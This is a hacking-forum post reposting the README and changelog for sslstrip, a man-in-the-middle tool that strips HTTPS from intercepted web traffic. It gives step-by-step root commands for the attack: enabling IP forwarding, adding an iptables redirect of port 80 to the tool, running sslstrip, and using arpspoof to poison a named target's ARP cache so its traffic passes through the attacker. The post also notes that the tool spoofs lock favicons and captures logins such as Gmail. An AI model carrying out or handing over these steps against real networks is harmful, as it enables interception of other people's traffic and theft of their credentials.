Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked SSLstrip

dEEpEst

By ADMINdEEpEst
in Python

 Share

Recommended Posts

dEEpEst Hacker

ADMINdEEpEst

Posted
Posted

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

 README 

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 
attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
	* Unpack: tar zxvf sslstrip-0.5.tar.gz
	* Install twisted:  sudo apt-get install python-twisted-web
	* (Optionally) run 'python setup.py install' as root to install, 
	  or you can just run it out of the directory.  

Running:
	sslstrip can be run from the source base without installation.  
	Just run 'python sslstrip.py -h' as a non-root user to get the 
	command-line options.

	The four steps to getting this working (assuming you're running Linux) 
	are:

	1) Flip your machine into forwarding mode (as root):
	   echo "1" > /proc/sys/net/ipv4/ip_forward

	2) Setup iptables to intercept HTTP requests (as root):
	   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
	
	3) Run sslstrip with the command-line options you'd like (see above).

	4) Run arpspoof to redirect traffic to your machine (as root):
	   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

 

 

Requirements

  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup 

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) 
    sudo python ./setup.py install

Running sslstrip

  • Flip your machine into forwarding mode. 
    echo "1" > /proc/sys/net/ipv4/ip_forward
  • Setup iptables to redirect HTTP traffic to sslstrip. 
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • Run sslstrip. 
    sslstrip.py -l <listenPort>
  • Run arpspoof to convince a network they should send their traffic to you. 
    arpspoof -i <interface> -t <targetIP> <gatewayIP>

That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Development

The current development branch can be found 

This is the hidden content, please
.

Changes in 0.9 (05/15/11)

  • Bug fixes introduced in 0.8 that were preventing GMail and other logins.
  • Speed enhancements.
  • Support for stripping compressed content-encodings if they slip past us.

Changes in 0.8 (04/24/11)

  • Major speed enhancements.
  • Compatibility changes for recent versions of twisted.
  • Support for stripping URLs with explicit port specifications (ie: foo.com:443)
  • A number of small bug fixes.

Changes in 0.7 (12/18/09)

  • Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).

Changes in 0.6 (9/22/09)

  • Fixed a silly bug in specifing the listen port with -l

Changes in 0.5 (9/11/09)

  • Switched to a fully asynchronous model, which should result in tremendous performance improvements.
  • Filter response headers.
  • Started embedding favicon links in the head section of server responses, to increase the chance that a browser will make a request for a secure favicon.

Changes in 0.4 (7/24/09)

  • Fixed a bug that would result in truncated pages.
  • Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
  • Included some optimzations that should speed things up again.

Changes in 0.3 (7/15/09)

  • Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
  • Included some optimizations that should speed things up a little.

Changes in 0.2 (02/25/09)

  • Fixed the listen port command-line option to actually work.

Changes in 0.1 (02/21/09)

  • Initial stripped-down public release.

 

Download:

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.